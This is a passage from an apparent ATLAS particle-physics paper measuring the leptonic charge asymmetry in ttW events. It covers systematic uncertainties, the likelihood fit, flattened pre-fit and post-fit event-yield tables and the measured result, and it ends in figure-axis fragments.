+ is implemented using the Scikit-learn [76] package. A 𝑘-fold cross validation with five folds is used for
540
+ the training and testing samples. The fraction of events in the 𝑡¯𝑡𝑊 sample in which the even lepton with
541
+ the highest BDT discriminator value originates from a top-quark or top-antiquark decay is estimated to be
542
+ about 71%, using the information from the MC event record.
543
+ 7 Systematic uncertainties in background and signal estimation
544
+ The predictions of the 𝑡¯𝑡𝑊 signal and the SM backgrounds are, in addition to the statistical uncertainties of
545
+ their corresponding MC samples, affected by several sources of experimental and theoretical systematic
546
+ uncertainty. These uncertainties are classified into the different categories that are described in the
547
+ following.
548
+ 7.1 Detector-related uncertainties
549
+ Detector-related uncertainties include the simulation of pile-up events, the integrated luminosity, and
550
+ effects related to the reconstruction and ID of the particle candidates used in the analysis.
551
+ The uncertainty in the combined 2015–2018 integrated luminosity is 1.7% [24], obtained using the
552
+ LUCID-2 detector [25] for the primary luminosity measurements. This systematic uncertainty affects all
553
+ processes modelled using MC simulations apart from the processes where the associated normalisation
554
+ factors are obtained from data in the simultaneous fit (see Section 8).
555
+ Uncertainties in the lepton reconstruction, ID, isolation and trigger efficiencies [62, 63, 77], electron energy
556
+ and muon momentum scale and resolution [62, 63] are considered. Uncertainties associated with jets arise
557
+ from the jet energy scale (JES), the jet energy resolution (JER) and the JVT jet selection requirement [68].
558
+ 11
559
+
560
+ In addition, uncertainties associated with the pile-up rejection [69], the scale and resolution of the 𝐸miss
561
+ T
562
+ [73],
563
+ and the 𝑏-tagging efficiencies [71, 78, 79] are considered.
564
+ 7.2 Signal and background modelling uncertainties
565
+ Different sources of systematic uncertainty in the theoretical predictions of the 𝑡¯𝑡𝑊 signal are considered.
566
+ To evaluate the effect of 𝜇r and 𝜇f uncertainties, the scale factors used in the ME of the Sherpa 𝑡¯𝑡𝑊
567
+ sample are varied simultaneously, as well as individually, by factors of 2.0 and 0.5 relative to their nominal
568
+ values (but not including combinations where the variations differ by a factor of four). Uncertainties
569
+ associated with the PDF sets are evaluated according to the PDF4LHC prescription [80]. They include
570
+ internal variations of the nominal PDF sets that are added in quadrature, uncertainties due to the choice of
571
+ PDF set, as well as variations of the 𝛼s parameter. The systematic uncertainties due to the modelling of
572
+ the ME are evaluated by comparing the prediction of the nominal MC sample with that of an alternative
573
+ 𝑡¯𝑡𝑊 sample simulated with MG5_aMC@NLO + Pythia and the FxFx algorithm. Furthermore, to
574
+ evaluate the systematic uncertainties due to the PS, the hadronisation and the underlying event, the 𝑡¯𝑡𝑊
575
+ Powheg + Pythia samples are compared with the Powheg + Herwig samples and their relative differences
576
+ are applied as uncertainties in the nominal Sherpa prediction. As explained in Section 3, the alternative
577
+ samples employed for the evaluation of modelling uncertainties are normalised to the same cross-sections
578
+ as the respective nominal samples, so that the systematic uncertainties cover only differences between the
579
+ shapes of kinematic variable distributions, but not the overall normalisations of the processes.
580
+ For the theoretical systematic uncertainties in the 𝑡¯𝑡𝑍 background, the same prescriptions as for the 𝑡¯𝑡𝑊
581
+ process are used to evaluate the effects of the 𝜇r and 𝜇f uncertainties. For the systematic uncertainties due
582
+ to the PS, the hadronisation and the underlying event, the nominal 𝑡¯𝑡𝑍 prediction is compared with that of
583
+ an alternative 𝑡¯𝑡𝑍 sample simulated with the same ME generator (MG5_aMC@NLO), but interfaced to
584
+ Herwig instead of Pythia. Further alternative 𝑡¯𝑡𝑍 samples using a set of variations of the A14 tune’s
585
+ parameters are used to evaluate the uncertainty associated with the ISR, as mentioned in Section 3.
586
+ For the 𝑡¯𝑡𝐻, 𝑡𝑍𝑞 and 𝑊𝑍/𝑍𝑍 + jets backgrounds, 𝜇r and 𝜇f uncertainties are considered. To evaluate
587
+ the uncertainty in the ME, the PS, the hadronisation and the underlying event of 𝑡¯𝑡𝐻, the nominal
588
+ prediction is compared with those from the alternative 𝑡¯𝑡𝐻 MC samples that use either a different ME
589
+ generator (MG5_aMC@NLO) or PS algorithm (Herwig). Furthermore, a normalisation uncertainty
590
+ of +5.8% and −9.2% is applied for 𝑡¯𝑡𝐻, following the NLO (QCD + EW) calculations from Ref. [54].
591
+ For the 𝑡𝑍𝑞 process, a normalisation uncertainty of 14% is applied, based on the dedicated ATLAS 𝑡𝑍𝑞
592
+ measurement described in Ref. [81]. For the 𝑊𝑍/𝑍𝑍 + jets backgrounds, a conservative normalisation
593
+ uncertainty of 20% is used to account for differences in the quality of 𝑊𝑍/𝑍𝑍 + jets modelling for different
594
+ 𝑏-jet multiplicities. This uncertainty is derived from the level of agreement between data and MC simulation
595
+ in several validation regions enriched in 𝑊𝑍/𝑍𝑍 + jets.
596
+ For the 𝑡¯𝑡 and 𝑍 + jets backgrounds, which can only contribute to 3ℓ final states via the presence of an
597
+ additional fake or non-prompt lepton, 𝜇r and 𝜇f uncertainties are also considered. For the 𝑡¯𝑡 process, the
598
+ PS, the hadronisation and the underlying event uncertainties are evaluated by comparing the nominal MC
599
+ sample (Powheg + Pythia) with an equivalent 𝑡¯𝑡 sample with the same ME generator, but interfaced to
600
+ Herwig. An extra uncertainty associated with the photon radiation in 𝑡¯𝑡 events is applied by comparing the
601
+ 12
602
+
603
+ predictions from 𝑡¯𝑡 and 𝑡¯𝑡 + 𝑡¯𝑡𝛾.5 For 𝑍 + jets, the uncertainties in the ME, the PS, the hadronisation and the
604
+ underlying event are evaluated from a comparison between the nominal MC samples (Powheg + Pythia)
605
+ and alternative 𝑍 + jets (𝑍𝛾) samples, which are simulated with Sherpa. The same approach as for 𝑡¯𝑡 is
606
+ followed to account for the uncertainty associated with the photon radiation in 𝑍 + jets events.
607
+ For the other (minor) background processes (𝑡𝑊, 𝑡𝑊𝑍, 𝑡¯𝑡𝑊𝑊, 𝐻 +𝑊/𝑍, 𝑉𝑉𝑉 (𝑉 = 𝑊/𝑍), 𝑡𝑡¯𝑡 and 𝑡¯𝑡𝑡¯𝑡),
608
+ which typically contribute less than 2% to the total event yields in the SRs, a normalisation uncertainty of
609
+ 30% is applied. This is a conservative approach, which should cover the known theoretical uncertainties of
610
+ these backgrounds. The same also applies to the MC sample generated with 𝑡¯𝑡𝑊 EW corrections at the
611
+ order 𝛼3𝛼s, as this is treated as a background (see Section 3).
612
+ 8 Extraction of the charge asymmetry at reconstruction level
613
+ To extract the leptonic charge asymmetry from the reconstructed leptons (detector level), a simultaneous fit
614
+ to the numbers of observed events in the SRs and CRs, as defined in Section 5, is performed. The fit is
615
+ based on the profile-likelihood technique, with a binned likelihood function defined as a product of Poisson
616
+ probabilities of the observed event yields in all the regions. Systematic uncertainties (see Section 7) are
617
+ taken into account in the likelihood function, each as a nuisance parameter constrained by a Gaussian
618
+ probability density function [82].
619
+ The normalisation factors for the most relevant background processes in the SRs, namely 𝑡¯𝑡𝑍, non-prompt
620
+ electrons/muons from HF decays and electrons from 𝛾-conversions, are allowed to float freely in the fit.
621
+ Events containing non-prompt leptons from HF decays and electrons from 𝛾-conversions are selected
622
+ from processes that cannot contribute directly to the 3ℓ final state: 𝑡¯𝑡, 𝑡𝑊 and 𝑍 + jets. These events are
623
+ identified by requiring at least one lepton to originate from either a 𝑏/𝑐-hadron (HF𝑒/𝜇) or a converted
624
+ photon (𝛾-conversion) according to the MC event records of the selected leptons. The variables used as
625
+ input to the binned likelihood fit are the 𝑝T of the third (softest) lepton in CR-HF𝑒 and CR-HF𝜇, as well as
626
+ the 𝐻T in CR-𝑡¯𝑡𝑍,6 since their distributions show a sizeable shape difference between the targeted processes
627
+ and the other SM backgrounds. In the SRs and CR-𝛾-conv, the total numbers of events are used.
628
+ Each of the four SRs is separated into Δ𝜂ℓ
629
+ BDT ≤ 0 (Δ𝜂−) and Δ𝜂ℓ
630
+ BDT > 0 (Δ𝜂+) regions. For the Δ𝜂− (Δ𝜂+)
631
+ set of regions, a single factor NΔ𝜂− (NΔ𝜂+) models the normalisations of the signal yields (relatively to
632
+ the SM cross-section) across the four SRs. Accordingly, the 𝐴ℓ
633
+ c value is extracted as a function of these
634
+ normalisation factors. Similarly, separate normalisation factors in the Δ𝜂− and Δ𝜂+ sets of regions for the
635
+ major background processes are allowed to float freely in the fit to avoid a bias from an assumption of
636
+ SM asymmetries for these processes in data.7 An ‘injection test’ is performed to verify that the fit result
637
+ matches an injected non-SM 𝐴ℓ
638
+ c value and the fit can deal correctly with the fact that the different SRs have
639
+ different charge asymmetries.
640
+ The predicted and observed numbers of events in the SRs and CRs before performing the simultaneous
641
+ fit (‘pre-fit’) are given in Table 2. The indicated uncertainties consider statistical as well as all experimental
642
+ and theoretical systematic uncertainties described in Section 7. The numbers of events in the SRs and
643
+ 5 The overlap between the photons radiated within the PS in the 𝑡¯𝑡 (𝑍 + jets) simulation and the photons coming from 𝑡¯𝑡𝛾 (𝑍𝛾) is
644
+ removed from 𝑡¯𝑡 (𝑍 + jets) for this comparison. This is done at particle level, where final-state photons that do not originate
645
+ from prompt particle decays are removed if they are inside the kinematic phase-space covered by the 𝑡¯𝑡𝛾 (𝑍𝛾) simulation.
646
+ 6 The 𝐻T is defined as the scalar sum of the 𝑝T of the selected jets in the event.
647
+ 7 The inclusive charge asymmetries at parton level for the simulated 𝑡¯𝑡𝑍 and 𝑡¯𝑡 samples are 𝐴ℓc = −0.015 and 0.004, respectively.
648
+ 13
649
+
650
+ CRs after the fit to data (‘post-fit’) are given in Table 3. Comparisons between data and the post-fit SM
651
+ predictions for the variables that are used for the binned likelihood fit are given in Figure 2 for CR-HF𝑒 and
652
+ CR-HF𝜇, and in Figure 3 for CR-𝑡¯𝑡𝑍 and CR-𝛾-conv. The data and the post-fit predictions for Δ𝜂− and
653
+ Δ𝜂+ in the four SRs are shown in Figure 4.
654
+ Table 2: The predicted and observed numbers of events in the control and signal regions. The predictions are shown
655
+ before the fit to data. The indicated uncertainties consider statistical as well as all experimental and theoretical
656
+ systematic uncertainties. Background categories with event yields shown as ‘—’ do contribute less than 0.01 to a
657
+ region.
658
+ Process
659
+ CR-𝑡¯𝑡𝑍
660
+ CR-HF𝑒
661
+ CR-HF𝜇
662
+ CR-𝛾-conv
663
+ Δ𝜂−
664
+ Δ𝜂+
665
+ Δ𝜂−
666
+ Δ𝜂+
667
+ Δ𝜂−
668
+ Δ𝜂+
669
+ Δ𝜂−
670
+ Δ𝜂+
671
+ 𝑡¯𝑡𝑊 (QCD)
672
+ 1.8 ± 0.4
673
+ 1.49 ± 0.19
674
+ 1.18 ± 0.19
675
+ 1.13 ± 0.18
676
+ 1.72 ± 0.20
677
+ 1.37 ± 0.28
678
+ 4.1 ± 0.7
679
+ 2.92 ± 0.18
680
+ 𝑡¯𝑡𝑊 (EW)
681
+ 0.18 ± 0.07
682
+ 0.16 ± 0.06
683
+ 0.10 ± 0.04
684
+ 0.09 ± 0.04
685
+ 0.09 ± 0.04
686
+ 0.14 ± 0.05
687
+ 0.23 ± 0.08
688
+ 0.36 ± 0.12
689
+ 𝑡¯𝑡𝑍
690
+ 107
691
+ ± 6
692
+ 107
693
+ ± 6
694
+ 1.42 ± 0.23
695
+ 1.5 ± 0.4
696
+ 2.20 ± 0.23
697
+ 2.00 ± 0.14
698
+ 4.04 ± 0.19
699
+ 3.65 ± 0.32
700
+ HF𝑒
701
+
702
+
703
+ 350
704
+ ± 40
705
+ 362
706
+ ± 27
707
+ 0.18 ± 0.11
708
+ 0.20 ± 0.09
709
+ 1.0 ± 0.6
710
+ 0.67 ± 0.35
711
+ HF𝜇
712
+ 0.14 ± 0.08
713
+ 0.19 ± 0.09
714
+ 0.20 ± 0.09
715
+ 0.28 ± 0.10
716
+ 520
717
+ ± 40
718
+ 530
719
+ ± 50
720
+ 0.9 ± 0.5
721
+ 1.1 ± 0.9
722
+ 𝛾-conv.
723
+ 0.55 ± 0.14
724
+ 0.41 ± 0.13
725
+ 3.8 ± 2.5
726
+ 4.7 ± 2.9
727
+ 2.6 ± 2.4
728
+ 3.3 ± 2.5
729
+ 18.8 ± 1.4
730
+ 17.5 ± 1.3
731
+ 𝑡¯𝑡𝐻
732
+ 3.3 ± 0.4
733
+ 3.20 ± 0.32
734
+ 0.87 ± 0.13
735
+ 0.89 ± 0.11
736
+ 1.18 ± 0.11
737
+ 1.22 ± 0.22
738
+ 1.48 ± 0.20
739
+ 1.5 ± 0.4
740
+ 𝑡𝑍𝑞
741
+ 12.6 ± 2.2
742
+ 11.0 ± 1.9
743
+ 0.48 ± 0.11
744
+ 0.43 ± 0.09
745
+ 0.95 ± 0.18
746
+ 0.81 ± 0.15
747
+ 0.68 ± 0.12
748
+ 0.70 ± 0.13
749
+ 𝑊𝑍/𝑍𝑍 + jets
750
+ 12
751
+ ± 4
752
+ 12
753
+ ± 4
754
+ 3.0 ± 0.9
755
+ 3.3 ± 1.0
756
+ 7.2 ± 2.4
757
+ 7.9 ± 2.5
758
+ 3.1 ± 0.9
759
+ 2.9 ± 0.8
760
+ Other
761
+ 10.7 ± 3.3
762
+ 10.2 ± 3.3
763
+ 14
764
+ ± 4
765
+ 13
766
+ ± 5
767
+ 17
768
+ ± 7
769
+ 17
770
+ ± 6
771
+ 1.6 ± 0.8
772
+ 1.5 ± 0.6
773
+ SM total
774
+ 148
775
+ ± 10
776
+ 146
777
+ ± 10
778
+ 380
779
+ ± 40
780
+ 387
781
+ ± 28
782
+ 550
783
+ ± 40
784
+ 560
785
+ ± 50
786
+ 35.9 ± 2.4
787
+ 32.9 ± 2.3
788
+ Data
789
+ 156
790
+ 176
791
+ 315
792
+ 373
793
+ 551
794
+ 592
795
+ 34
796
+ 40
797
+ Process
798
+ SR-1𝑏-low𝑁jets
799
+ SR-1𝑏-high𝑁jets
800
+ SR-2𝑏-low𝑁jets
801
+ SR-2𝑏-high𝑁jets
802
+ Δ𝜂−
803
+ Δ𝜂+
804
+ Δ𝜂−
805
+ Δ𝜂+
806
+ Δ𝜂−
807
+ Δ𝜂+
808
+ Δ𝜂−
809
+ Δ𝜂+
810
+ 𝑡¯𝑡𝑊 (QCD)
811
+ 19
812
+ ± 3
813
+ 17
814
+ ± 4
815
+ 9.2 ± 1.1
816
+ 8.2 ± 1.1
817
+ 25
818
+ ± 7
819
+ 21
820
+ ± 6
821
+ 14.7 ± 3.4
822
+ 12.2 ± 1.9
823
+ 𝑡¯𝑡𝑊 (EW)
824
+ 1.06 ± 0.34
825
+ 1.3 ± 0.4
826
+ 1.05 ± 0.34
827
+ 1.07 ± 0.34
828
+ 1.2 ± 0.4
829
+ 1.3 ± 0.4
830
+ 1.8 ± 0.6
831
+ 1.6 ± 0.5
832
+ 𝑡¯𝑡𝑍
833
+ 12.0 ± 1.0
834
+ 12.1 ± 1.1
835
+ 15.5 ± 1.4
836
+ 15.5 ± 1.1
837
+ 11.4 ± 1.4
838
+ 10.8 ± 1.4
839
+ 26.2 ± 1.8
840
+ 25.8 ± 1.7
841
+ HF𝑒
842
+ 7.2 ± 1.2
843
+ 7.5 ± 1.5
844
+ 1.7 ± 0.7
845
+ 1.6 ± 0.6
846
+ 0.7 ± 0.5
847
+ 0.6 ± 0.5
848
+ 0.69 ± 0.35
849
+ 0.37 ± 0.19
850
+ HF𝜇
851
+ 12.5 ± 2.0
852
+ 13
853
+ ± 4
854
+ 3.2 ± 0.8
855
+ 3.5 ± 1.3
856
+ 1.35 ± 0.34
857
+ 1.11 ± 0.33
858
+ 1.0 ± 0.4
859
+ 0.9 ± 0.5
860
+ 𝛾-conv.
861
+ 6.7 ± 0.9
862
+ 6.1 ± 1.0
863
+ 3.1 ± 0.5
864
+ 3.4 ± 0.8
865
+ 6.1 ± 0.8
866
+ 6.9 ± 0.8
867
+ 4.4 ± 0.7
868
+ 4.6 ± 0.6
869
+ 𝑡¯𝑡𝐻
870
+ 5.5 ± 0.8
871
+ 5.6 ± 0.8
872
+ 8.6 ± 0.8
873
+ 8.7 ± 0.9
874
+ 5.5 ± 1.1
875
+ 5.5 ± 1.0
876
+ 14.1 ± 1.8
877
+ 14.2 ± 1.7
878
+ 𝑡𝑍𝑞
879
+ 5.1 ± 0.9
880
+ 4.2 ± 0.7
881
+ 1.40 ± 0.31
882
+ 1.15 ± 0.27
883
+ 2.8 ± 0.5
884
+ 2.3 ± 0.4
885
+ 1.92 ± 0.34
886
+ 1.64 ± 0.30
887
+ 𝑊𝑍/𝑍𝑍 + jets
888
+ 15
889
+ ± 4
890
+ 14
891
+ ± 4
892
+ 8.0 ± 2.8
893
+ 7.6 ± 2.5
894
+ 2.9 ± 0.9
895
+ 2.2 ± 0.7
896
+ 2.2 ± 0.7
897
+ 2.2 ± 0.7
898
+ Other
899
+ 5.6 ± 2.0
900
+ 5.1 ± 1.6
901
+ 4.5 ± 2.4
902
+ 4.7 ± 1.5
903
+ 2.6 ± 1.1
904
+ 2.9 ± 1.3
905
+ 10
906
+ ± 6
907
+ 9
908
+ ± 5
909
+ SM total
910
+ 89
911
+ ± 6
912
+ 85
913
+ ± 7
914
+ 56
915
+ ± 6
916
+ 56
917
+ ± 6
918
+ 59
919
+ ± 9
920
+ 55
921
+ ± 7
922
+ 77
923
+ ± 8
924
+ 73
925
+ ± 7
926
+ Data
927
+ 94
928
+ 89
929
+ 50
930
+ 69
931
+ 84
932
+ 81
933
+ 89
934
+ 81
935
+ The normalisation factors for the major background processes, N𝑡 ¯𝑡𝑍, N𝑒
936
+ 𝛾-conv, N𝑒
937
+ HF and N 𝜇
938
+ HF (all obtained
939
+ separately for Δ𝜂− and Δ𝜂+), together with NΔ𝜂− and the 𝐴ℓ
940
+ c value for the 𝑡¯𝑡𝑊 signal, are given in Figure 5.
941
+ The normalisation factor for the 𝑡¯𝑡𝑊 process was checked and found to be (within its uncertainty) compatible
942
+ with the latest ATLAS and CMS 𝑡¯𝑡𝑊 cross-section measurements [7, 8]. Tests using MC simulation were
943
+ also performed to validate that the extracted 𝐴ℓ
944
+ c value is not biased by the absolute normalisation of the
945
+ 𝑡¯𝑡𝑊 process.
946
+ The normalisation factors for some of the background processes (in particular N𝑡 ¯𝑡𝑍 and N𝑒
947
+ 𝛾-conv) show
948
+ small differences between Δ𝜂− and Δ𝜂+. As these processes are not expected to have significant charge
949
+ 14
950
+
951
+ Table 3: The predicted and observed numbers of events in the control and signal regions. The predictions are
952
+ shown after the fit to data. The indicated uncertainties consider statistical as well as all experimental and theoretical
953
+ systematic uncertainties. Background categories with event yields shown as ‘—’ do contribute less than 0.01 to a
954
+ region.
955
+ Process
956
+ CR-𝑡¯𝑡𝑍
957
+ CR-HF𝑒
958
+ CR-HF𝜇
959
+ CR-𝛾-conv
960
+ Δ𝜂−
961
+ Δ𝜂+
962
+ Δ𝜂−
963
+ Δ𝜂+
964
+ Δ𝜂−
965
+ Δ𝜂+
966
+ Δ𝜂−
967
+ Δ𝜂+
968
+ 𝑡¯𝑡𝑊 (QCD)
969
+ 3.2 ± 0.7
970
+ 2.2 ± 0.7
971
+ 1.8 ± 0.5
972
+ 1.7 ± 0.5
973
+ 2.6 ± 0.8
974
+ 1.8 ± 0.8
975
+ 7.0 ± 1.3
976
+ 4.4 ± 1.3
977
+ 𝑡¯𝑡𝑊 (EW)
978
+ 0.18 ± 0.06
979
+ 0.16 ± 0.05
980
+ 0.10 ± 0.03
981
+ 0.09 ± 0.03
982
+ 0.09 ± 0.03
983
+ 0.14 ± 0.04
984
+ 0.23 ± 0.07
985
+ 0.36 ± 0.11
986
+ 𝑡¯𝑡𝑍
987
+ 114
988
+ ± 13
989
+ 138
990
+ ± 14
991
+ 1.45 ± 0.27
992
+ 1.7 ± 0.4
993
+ 2.3 ± 0.4
994
+ 2.55 ± 0.35
995
+ 4.3 ± 0.6
996
+ 4.6 ± 0.6
997
+ HF𝑒
998
+
999
+
1000
+ 290
1001
+ ± 18
1002
+ 346
1003
+ ± 20
1004
+ 0.15 ± 0.02
1005
+ 0.19 ± 0.02
1006
+ 0.59 ± 0.27
1007
+ 0.52 ± 0.17
1008
+ HF𝜇
1009
+ 0.13 ± 0.01
1010
+ 0.20 ± 0.02
1011
+ 0.20 ± 0.02
1012
+ 0.28 ± 0.03
1013
+ 516
1014
+ ± 25
1015
+ 556
1016
+ ± 25
1017
+ 0.8 ± 0.4
1018
+ 1.3 ± 0.8
1019
+ 𝛾-conv.
1020
+ 0.40 ± 0.18
1021
+ 0.52 ± 0.16
1022
+ 2.8 ± 2.2
1023
+ 6
1024
+ ± 4
1025
+ 1.9 ± 2.0
1026
+ 4.2 ± 3.4
1027
+ 14
1028
+ ± 6
1029
+ 22
1030
+ ± 7
1031
+ 𝑡¯𝑡𝐻
1032
+ 3.3 ± 0.4
1033
+ 3.23 ± 0.31
1034
+ 0.86 ± 0.13
1035
+ 0.87 ± 0.10
1036
+ 1.16 ± 0.11
1037
+ 1.19 ± 0.22
1038
+ 1.49 ± 0.20
1039
+ 1.6 ± 0.4
1040
+ 𝑡𝑍𝑞
1041
+ 12.6 ± 2.2
1042
+ 11.0 ± 1.9
1043
+ 0.47 ± 0.10
1044
+ 0.42 ± 0.08
1045
+ 0.95 ± 0.17
1046
+ 0.79 ± 0.14
1047
+ 0.68 ± 0.11
1048
+ 0.70 ± 0.12
1049
+ 𝑊𝑍/𝑍𝑍 + jets
1050
+ 10.2 ± 2.9
1051
+ 10.6 ± 3.1
1052
+ 2.6 ± 0.7
1053
+ 2.8 ± 0.7
1054
+ 6.3 ± 1.7
1055
+ 6.7 ± 1.8
1056
+ 2.6 ± 0.7
1057
+ 2.5 ± 0.6
1058
+ Other
1059
+ 10.8 ± 3.2
1060
+ 10.0 ± 2.9
1061
+ 14
1062
+ ± 4
1063
+ 13
1064
+ ± 5
1065
+ 18
1066
+ ± 7
1067
+ 18
1068
+ ± 6
1069
+ 1.7 ± 0.8
1070
+ 1.7 ± 0.6
1071
+ SM total
1072
+ 155
1073
+ ± 12
1074
+ 175
1075
+ ± 13
1076
+ 315
1077
+ ± 18
1078
+ 373
1079
+ ± 19
1080
+ 550
1081
+ ± 23
1082
+ 591
1083
+ ± 24
1084
+ 33
1085
+ ± 6
1086
+ 40
1087
+ ± 6
1088
+ Data
1089
+ 156
1090
+ 176
1091
+ 315
1092
+ 373
1093
+ 551
1094
+ 592
1095
+ 34
1096
+ 40
1097
+ Process
1098
+ SR-1𝑏-low𝑁jets
1099
+ SR-1𝑏-high𝑁jets
1100
+ SR-2𝑏-low𝑁jets
1101
+ SR-2𝑏-high𝑁jets
1102
+ Δ𝜂−
1103
+ Δ𝜂+
1104
+ Δ𝜂−
1105
+ Δ𝜂+
1106
+ Δ𝜂−
1107
+ Δ𝜂+
1108
+ Δ𝜂−
1109
+ Δ𝜂+
1110
+ 𝑡¯𝑡𝑊 (QCD)
1111
+ 32
1112
+ ± 6
1113
+ 27
1114
+ ± 6
1115
+ 14
1116
+ ± 4
1117
+ 12.1 ± 3.4
1118
+ 46
1119
+ ± 9
1120
+ 36
1121
+ ± 8
1122
+ 26
1123
+ ± 6
1124
+ 19
1125
+ ± 5
1126
+ 𝑡¯𝑡𝑊 (EW)
1127
+ 1.04 ± 0.32
1128
+ 1.3 ± 0.4
1129
+ 1.04 ± 0.32
1130
+ 1.05 ± 0.32
1131
+ 1.2 ± 0.4
1132
+ 1.3 ± 0.4
1133
+ 1.8 ± 0.5
1134
+ 1.6 ± 0.5
1135
+ 𝑡¯𝑡𝑍
1136
+ 12.4 ± 2.0
1137
+ 15.0 ± 2.2
1138
+ 16.0 ± 2.2
1139
+ 19.6 ± 2.3
1140
+ 12.3 ± 2.3
1141
+ 14.3 ± 2.6
1142
+ 27.6 ± 3.3
1143
+ 33.2 ± 3.5
1144
+ HF𝑒
1145
+ 6.4 ± 1.0
1146
+ 6.8 ± 0.8
1147
+ 1.5 ± 0.5
1148
+ 1.7 ± 0.4
1149
+ 0.40 ± 0.20
1150
+ 0.79 ± 0.35
1151
+ 0.45 ± 0.14
1152
+ 0.39 ± 0.14
1153
+ HF𝜇
1154
+ 12.5 ± 1.5
1155
+ 13.6 ± 2.5
1156
+ 3.1 ± 0.6
1157
+ 3.6 ± 0.9
1158
+ 1.30 ± 0.23
1159
+ 1.19 ± 0.19
1160
+ 1.04 ± 0.29
1161
+ 0.9 ± 0.5
1162
+ 𝛾-conv.
1163
+ 4.9 ± 2.3
1164
+ 7.7 ± 2.6
1165
+ 2.3 ± 1.1
1166
+ 4.3 ± 1.6
1167
+ 4.6 ± 2.1
1168
+ 8.8 ± 2.9
1169
+ 3.3 ± 1.5
1170
+ 5.9 ± 1.9
1171
+ 𝑡¯𝑡𝐻
1172
+ 5.4 ± 0.8
1173
+ 5.5 ± 0.8
1174
+ 8.4 ± 0.8
1175
+ 8.6 ± 0.8
1176
+ 5.5 ± 1.1
1177
+ 5.6 ± 1.0
1178
+ 14.3 ± 1.7
1179
+ 14.4 ± 1.7
1180
+ 𝑡𝑍𝑞
1181
+ 5.0 ± 0.9
1182
+ 4.1 ± 0.7
1183
+ 1.38 ± 0.27
1184
+ 1.16 ± 0.24
1185
+ 2.8 ± 0.5
1186
+ 2.3 ± 0.4
1187
+ 1.93 ± 0.33
1188
+ 1.65 ± 0.29
1189
+ 𝑊𝑍/𝑍𝑍 + jets
1190
+ 12.6 ± 3.0
1191
+ 12.3 ± 3.0
1192
+ 6.7 ± 2.0
1193
+ 6.5 ± 1.8
1194
+ 2.5 ± 0.7
1195
+ 1.9 ± 0.5
1196
+ 1.9 ± 0.6
1197
+ 1.9 ± 0.5
1198
+ Other
1199
+ 6.0 ± 2.1
1200
+ 5.2 ± 1.6
1201
+ 3.6 ± 1.8
1202
+ 4.6 ± 1.4
1203
+ 2.9 ± 1.2
1204
+ 3.3 ± 1.3
1205
+ 8
1206
+ ± 4
1207
+ 8
1208
+ ± 4
1209
+ SM total
1210
+ 99
1211
+ ± 6
1212
+ 98
1213
+ ± 6
1214
+ 58
1215
+ ± 4
1216
+ 63
1217
+ ± 4
1218
+ 80
1219
+ ± 8
1220
+ 75
1221
+ ± 7
1222
+ 85
1223
+ ± 6
1224
+ 86
1225
+ ± 5
1226
+ Data
1227
+ 94
1228
+ 89
1229
+ 50
1230
+ 69
1231
+ 84
1232
+ 81
1233
+ 89
1234
+ 81
1235
+ asymmetries in the SM at this level of precision, there is an uncertainty on how best to model this data. In
1236
+ the nominal fit, due to the independent normalisation factors for Δ𝜂− and Δ𝜂+ in the CRs, the observed
1237
+ background asymmetries are precisely modelled. To account for the possibility that the observed asymmetry
1238
+ is due to a systematic effect, an alternative fit is performed where only one normalisation factor is assigned
1239
+ to each of these processes (thus fixing their asymmetries to the SM expectation). The difference between
1240
+ the results of these two fit set-ups is assigned as an extra systematic uncertainty in the extracted 𝐴ℓ
1241
+ c value.
1242
+ This uncertainty (denoted as Δ𝜂± CR-dependency) is found to be 0.046 and is one of the leading systematic
1243
+ uncertainties.
1244
+ The leptonic charge asymmetry in 𝑡¯𝑡𝑊 is found to be
1245
+ 𝐴ℓ
1246
+ c (𝑡¯𝑡𝑊) = −0.123 ± 0.136 (stat.) ± 0.051 (syst.),
1247
+ 15
1248
+
1249
+ This is consistent with the SM expectation of
1250
+ 𝐴ℓ
1251
+ c (𝑡¯𝑡𝑊)SM = −0.084 +0.005
1252
+ −0.003 (scale) ± 0.006 (MC stat.),
1253
+ calculated using the nominal 𝑡¯𝑡𝑊 Sherpa simulation. The contributions from the most relevant uncertainties
1254
+ are summarised in Table 4. The uncertainties are symmetrised and grouped into several type-related
1255
+ categories and are shown together with the total systematic and statistical uncertainties. The dominant
1256
+ systematic uncertainties are the Δ𝜂± CR-dependency, the JER, as well as the modelling uncertainties of the
1257
+ 𝑡¯𝑡𝑊 and 𝑡¯𝑡𝑍 MC processes detailed in Section 7. Overall, the result is limited by the statistical uncertainty
1258
+ of the data.
1259
+ Table 4: List of the most relevant systematic and statistical uncertainties in the extracted leptonic charge asymmetry
1260
+ 𝐴ℓ
1261
+ c (𝑡¯𝑡𝑊) from the simultaneous fit. For this table, the uncertainties are symmetrised and grouped into categories. The
1262
+ sum in quadrature of the individual uncertainties is not necessarily equal to the total uncertainty due to correlations
1263
+ introduced by the fit.
1264
+ Δ𝐴ℓc (𝑡 ¯𝑡𝑊 )
1265
+ Experimental uncertainties
1266
+ Jet energy resolution
1267
+ 0.013
1268
+ Pile-up
1269
+ 0.007
1270
+ 𝑏-tagging
1271
+ 0.005
1272
+ Leptons
1273
+ 0.004
1274
+ 𝐸miss
1275
+ T
1276
+ 0.004
1277
+ Jet energy scale
1278
+ 0.003
1279
+ Luminosity
1280
+ 0.001
1281
+ MC modelling uncertainties
1282
+ 𝑡 ¯𝑡𝑊 modelling
1283
+ 0.013
1284
+ 𝑡 ¯𝑡𝑍 modelling
1285
+ 0.010
1286
+ HF𝑒/𝜇 modelling
1287
+ 0.006
1288
+ 𝑡 ¯𝑡𝐻 modelling
1289
+ 0.005
1290
+ Other uncertainties
1291
+ Δ𝜂± CR-dependency
1292
+ 0.046
1293
+ MC statistical uncertainty
1294
+ 0.019
1295
+ Data statistical uncertainty
1296
+ 0.136
1297
+ Total uncertainty
1298
+ 0.145
1299
+ 9 Unfolding and extraction of the charge asymmetry at particle level
1300
+ To obtain the charge asymmetry at particle level in a specific fiducial volume, an unfolding procedure
1301
+ is performed to correct for detector effects, as well as for signal efficiency and acceptance effects. The
1302
+ procedure and the relevant definitions are explained in the following.
1303
+ 16
1304
+
1305
+ 15
1306
+ 20
1307
+ 25
1308
+ 30
1309
+ 35
1310
+ 40
1311
+ 45
1312
+ 50
1313
+ [GeV]
1314
+ T
1315
+ 3rd Leading Lepton p
1316
+ 0.5
1317
+ 0.75
1318
+ 1
1319
+ 1.25
1320
+
1321
+ Data / Pred.
1322
+ 0
1323
+ 50
1324
+ 100
1325
+ 150
1326
+ 200
1327
+ 250
1328
+ Events
1329
+ ATLAS
1330
+ -1
1331
+ = 13 TeV, 139 fb
1332
+ s
1333
+
1334
+ η
